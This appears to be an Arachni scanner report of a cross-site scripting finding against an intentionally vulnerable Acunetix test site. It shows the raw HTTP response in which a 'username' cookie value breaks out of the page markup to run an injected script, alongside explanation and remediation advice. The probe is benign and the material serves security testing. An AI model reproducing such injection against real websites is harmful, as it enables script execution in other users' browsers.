arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> Showing last <b>50</b> items </div> </div> <!-- ngRepeat: item in items | filter:searchText --><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> blog.github.com </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> <hr> </div><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> ssd.eff.org </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. <br><br> </div> </div> <hr> </div><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> www.eff.org </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> <hr> </div><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> twitter.com </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> <hr> </div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">unknown is coming from <b>unknown</b> and has visited this page <b>2</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.
If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to force the page to execute custom JavaScript code.
To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page.
Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc.
Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include:
&<>"'/An example of HTML entity encoding is converting < to <.
Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed:
Each of these locations have their own form of escaping and filtering.
Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions.
cookie
input
username
using
GET
at
http://testhtml5.vulnweb.com/login
pointing to
http://testhtml5.vulnweb.com/
.
0 | username=admin; Path=/ |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
cookie |
http://testhtml5.vulnweb.com/login | http://testhtml5.vulnweb.com/ |
|
|
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 2.753966 | load |
page
|
|
||
| 1 | 0.101266 | request |
http://testhtml5.vulnweb.com/ |
|
||
| 2 | 0.30972 | request |
http://testhtml5.vulnweb.com/static/app/app.js |
|
||
| 3 | 1.032875 | request |
http://testhtml5.vulnweb.com/static/app/libs/sessvars.js |
|
||
| 4 | 0.319147 | request |
http://testhtml5.vulnweb.com/static/app/post.js |
|
||
| 5 | 1.133606 | request |
http://testhtml5.vulnweb.com/static/app/controllers/controllers.js |
|
||
| 6 | 0.290224 | request |
http://testhtml5.vulnweb.com/static/app/services/itemsService.js |
|
||
| 7 | 0.91418 | request |
http://testhtml5.vulnweb.com/static/css/style.css |
|
||
| 8 | 0.302201 | request |
http://testhtml5.vulnweb.com/static/img/logo2.png |
|
||
| 9 | 0.262858 | request |
http://testhtml5.vulnweb.com/static/app/partials/popular.html |
|
||
| 10 | 0.300197 | request |
http://testhtml5.vulnweb.com/static/app/partials/itemsList.html |
|
||
| 11 | 0.299201 | request |
http://testhtml5.vulnweb.com/ajax/popular?offset=0 |
|
||
| 12 | 0.248878 | request |
http://testhtml5.vulnweb.com/static/scr/default.png |
|
Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.
| # | Data | |
|---|---|---|
| 0 |
No helper data logged. |
Inspect |
Raw HTTP request used to retrieve the page.
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:58:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
Welcome <b></script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</b> | <a href='/logout'>Logout</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
